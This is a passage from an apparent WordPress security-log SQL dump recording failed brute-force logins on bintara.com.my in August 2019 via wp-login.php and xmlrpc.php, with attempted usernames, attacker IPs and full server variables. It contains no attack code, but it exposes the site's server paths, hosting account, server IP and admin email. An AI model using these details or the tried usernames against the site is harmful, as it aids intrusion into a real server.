dWNewAAAEQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566811788.288\";s:12:\"REQUEST_TIME\";s:10:\"1566811788\";}}','notice','2019-08-26 09:29:49','2019-08-26 09:29:48',17682640,19173496,'https://bintara.com.my/wp-login.php',1,0,'162.144.83.250'),(23103,0,'brute_force','invalid-login::username-mike','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"mike\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.83.250\";s:11:\"REMOTE_PORT\";s:5:\"38786\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOmj3xaD7qVX4VJuZ-3eQAAAAM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566811791.6429\";s:12:\"REQUEST_TIME\";s:10:\"1566811791\";}}','notice','2019-08-26 09:29:52','2019-08-26 09:29:51',18201912,19501464,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.83.250'),(23104,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"144.202.126.37\";s:11:\"REMOTE_PORT\";s:5:\"37877\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOqmklLQKVpx7Mms7vG3gAAAcQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566812826.3374\";s:12:\"REQUEST_TIME\";s:10:\"1566812826\";}}','notice','2019-08-26 09:47:07','2019-08-26 09:47:06',17683784,19173280,'https://bintara.com.my/wp-login.php',1,0,'144.202.126.37'),(23105,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"144.202.126.37\";s:11:\"REMOTE_PORT\";s:5:\"38759\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOqncc7g4l7i3TBndWQQwAAAEo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566812829.2737\";s:12:\"REQUEST_TIME\";s:10:\"1566812829\";}}','notice','2019-08-26 09:47:11','2019-08-26 09:47:09',18200728,19495200,'https://bintara.com.my/xmlrpc.php',1,0,'144.202.126.37'),(23106,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"35.240.192.227\";s:11:\"REMOTE_PORT\";s:5:\"60954\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOs0LLuw7edOKpgf7CBpwAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566813392.8722\";s:12:\"REQUEST_TIME\";s:10:\"1566813392\";}}','notice','2019-08-26 09:56:34','2019-08-26 09:56:33',17689560,19177048,'https://bintara.com.my/wp-login.php',1,0,'35.240.192.227'),(23107,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"35.240.192.227\";s:11:\"REMOTE_PORT\";s:5:\"60954\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOs0LLuw7edOKpgf7CBpwAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566813392.8722\";s:12:\"REQUEST_TIME\";s:10:\"1566813392\";}}','notice','2019-08-26 09:56:35','2019-08-26 09:56:33',17851280,19177048,'https://bintara.com.my/wp-login.php',1,0,'35.240.192.227'),(23108,0,'brute_force','invalid-login::username-garak','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"garak\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"35.240.192.227\";s:11:\"REMOTE_PORT\";s:5:\"33132\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOs0zzAXRCh@i15RK06rgAAANE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566813395.2703\";s:12:\"REQUEST_TIME\";s:10:\"1566813395\";}}','notice','2019-08-26 09:56:36','2019-08-26 09:56:35',18199800,19493968,'https://bintara.com.my/xmlrpc.php',1,0,'35.240.192.227'),(23109,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"165.22.127.56\";s:11:\"REMOTE_PORT\";s:5:\"61716\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOvJ3xaD7qVX4VJuZ-6NAAAAAU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566813991.6402\";s:12:\"REQUEST_TIME\";s:10:\"1566813991\";}}','notice','2019-08-26 10:06:33','2019-08-26 10:06:32',17684592,19174904,'https://bintara.com.my/wp-login.php',1,0,'165.22.127.56'),(23110,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"165.22.127.56\";s:11:\"REMOTE_PORT\";s:5:\"62259\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOvLzzAXRCh@i15RK07IQAAAMw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566813999.9387\";s:12:\"REQUEST_TIME\";s:10:\"1566813999\";}}','notice','2019-08-26 10:06:41','2019-08-26 10:06:40',18199608,19495248,'https://bintara.com.my/xmlrpc.php',1,0,'165.22.127.56'),(23111,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"34.76.36.242\";s:11:\"REMOTE_PORT\";s:5:\"44284\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOxMcc7g4l7i3TBndWUdAAAAEY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566814513.7004\";s:12:\"REQUEST_TIME\";s:10:\"1566814513\";}}'